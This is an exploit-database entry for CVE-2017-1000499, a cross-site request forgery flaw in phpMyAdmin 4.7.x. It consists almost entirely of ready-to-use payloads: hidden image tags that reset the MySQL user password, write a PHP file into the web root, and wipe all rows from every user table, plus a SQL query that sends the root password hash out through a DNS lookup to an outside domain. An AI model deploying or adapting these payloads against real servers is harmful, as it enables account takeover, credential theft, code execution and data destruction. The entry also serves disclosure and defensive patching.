phpMyAdmin 4.7.x Cross Site Request Forgery

2018-08-31T00:00:00
ID PACKETSTORM:149168
Type packetstorm
Reporter VulnSpy
Modified 2018-08-31T00:00:00

Description

                                        
                                            `# Exploit Title: phpMyAdmin 4.7.x - Cross-Site Request Forgery  
# Date: 2018-08-28  
# Exploit Author: VulnSpy  
# Vendor Homepage: https://www.phpmyadmin.net/  
# Software Link: https://www.phpmyadmin.net/downloads/  
# Version: Versions 4.7.x (prior to 4.7.7)  
# Tested on: php7 mysql5  
# CVE: CVE-2017-1000499  
  
# Exploit CSRF - Modifying the password of current user  
  
<p>Hello World</p>  
<img src="  
http://server/sql.php?db=mysql&table=user&sql_query=SET%20password  
%20=%20PASSWORD(%27www.vulnspy.com%27)" style="display:none;" />  
  
# Exploit CSRF - Arbitrary File Write  
  
<p>Hello World</p>  
<img src="  
http://server/sql.php?db=mysql&table=user&sql_query=select  
'<?php phpinfo();?>' into outfile '/var/www/html/test.php';"  
style="display:none;" />  
  
# Exploit CSRF - Data Retrieval over DNS  
  
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE  
user='root' LIMIT 1),'.vulnspy.com\\test'));  
  
# Exploit CSRF - Empty All Rows From All Tables  
  
<p>Hello World</p>  
<img src="  
http://server/import.php?db=mysql&table=user&sql_query=DROP+PROCEDURE+IF+EXISTS+EMPT%3B%0ADELIMITER+%24%24%0A++++CREATE+PROCEDURE+EMPT%28%29%0A++++BEGIN%0A++++++++DECLARE+i+INT%3B%0A++++++++SET+i+%3D+0%3B%0A++++++++WHILE+i+%3C+100+DO%0A++++++++++++SET+%40del+%3D+%28SELECT+CONCAT%28%27DELETE+FROM+%27%2CTABLE_SCHEMA%2C%27.%27%2CTABLE_NAME%29+FROM+information_schema.TABLES+WHERE+TABLE_SCHEMA+NOT+LIKE+%27%25_schema%27+and+TABLE_SCHEMA%21%3D%27mysql%27+LIMIT+i%2C1%29%3B%0A++++++++++++PREPARE+STMT+FROM+%40del%3B%0A++++++++++++EXECUTE+stmt%3B%0A++++++++++++SET+i+%3D+i+%2B1%3B%0A++++++++END+WHILE%3B%0A++++END+%24%24%0ADELIMITER+%3B%0A%0ACALL+EMPT%28%29%3B%0A"  
style="display:none;" />  
  
  
`